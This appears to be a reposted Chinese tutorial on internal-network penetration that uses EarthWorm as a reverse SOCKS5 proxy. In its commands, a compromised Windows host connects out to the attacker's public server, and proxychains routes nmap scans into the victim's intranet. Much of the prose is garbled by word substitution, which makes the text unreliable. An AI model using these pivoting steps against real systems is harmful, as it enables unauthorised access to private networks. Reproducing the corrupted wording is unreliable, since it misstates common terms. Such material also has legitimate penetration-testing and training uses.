|
|
|
联系客服020-83701501

如何通过EW做Socks5代理进行内网渗透

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
如何颠末EW做Socks5代理住手内网渗透

0x00 前言

迩来搞站的时分有内网穿透的需要,大佬向我推荐了EW,本文模拟一个攻击场景对Earthworm的把持动作做一个简单的介绍。实在相应的内容EW的官网已经说得很详细了,我这里隧道是作为小我笔记从如下几个方面做一个简单的记录:

1、如何把持EW做反向Socks5代理

2、浏览器如何设置Socks5代理拜访目标内网Web任事

3、操纵proxychains给终端设置Socks5代理(方便将外地号令行对象的流量代理进目标内网)

0x01 基础底细环境及Internet拓扑

Kali Linux(Attacker 内网 192.168.40.135)

Ubuntu 16.04.3(Attacker 公网 http://120.xxxx.xxx.xxx)

Windows Server 2008(Victim 目标内网 http://10.xxxx.xxx.xxx)

Internet拓扑:Kali Linux是我外地的一台虚构机,Ubuntu是公网上的一台ECS,Windows Server 2008是目标呆滞,内网IP,部门端口照耀到外网。

此处理当有一个拓扑图,等我以后深造下Visio,在把图弥补上去23333

0x02 场景模拟

我们现在已拿到目标内网一台呆滞的权限(该呆滞将80端口照耀至外网,Web任事存在缝隙,已拿到网站shell)。需要对内网做进一步的渗透,目前我有一台公网的Ubuntu,一台内网的Kali,如何反向Socks5将Kali的流量代理进目标内网?

0x03 把持EW做反向Socks5代理

这里我仅演示颠末EW做反向Socks5代理,正向、多级级联的的代理方法大要参考官方文档。

第1步:在公网的Ubuntu上实验如下号令:

Default
1 ./ew_for_linux64 -s rcsocks -l 1080 -e 1024 &

该号令的意思是说公网呆滞监听1080和1024端口。等待攻击者呆滞拜访1080端口,目标呆滞拜访1024端口。

第2步:目标呆滞实验如下号令:

Default
1 ew_for_Win.exe -s rssocks -d 120.xxx.xxx.xx -e 1024

此中-d参数的值为刚刚的公网IP

第3步:攻击者呆滞颠末proxychains或浏览器设置Socks5代理拜访目标内网任事

0x04 浏览器设置Socks5代理

设置完毕后点击肯定便可。此时已大要颠末浏览器拜访目标内网的Web任事。

0x05 把持proxychains给终端设置Socks5代理

第1步:下载及部署proxychains

Default
1234567 cd /usr/local/srcgit clone https://github.com/rofl0r/proxychains-ng.gitcd proxychains-ng ./configure --prefix=/usr --sysconfdir=/etcmake && make installmake install-configcd .. && rm -rf proxychains-ng

第2步:编辑proxychains设置装备摆设文件设置代理

Default
12 vi /etc/proxychains.confsocks5  120.xx.xx.xx 1080

第3步:举个栗子:把持proxychains nmap对目标内网扫描

设置实现后便可把持雷同proxychains nmap 192.168.40.133这种方法将nmap的流量代理至目标内网住手扫描,别的号令行对象同理。

0x06 跋文

在把持的历程中也出现了一些标题,有的对象流量不走sock5代理,就很难看,具体原因不详。有点困了,回家睡觉,剩下的标题本日再企图。身体是反动的老本。

巴望对这方面内容感乐趣的同窗偶然看到了这篇文章能有所播种吧,诚然,如有舛误还请不吝见教。

0x07 参考链接

针对国内一大厂的后渗透 – 持续

操纵proxychains在终端把持socks5代理 – CSDN博客

https://jingyan.baidu.com/album/b87fe19e9c0f9d5218356829.html?picindex=2

EarthWorm

作者:童话

数安新闻+更多

证书相关+更多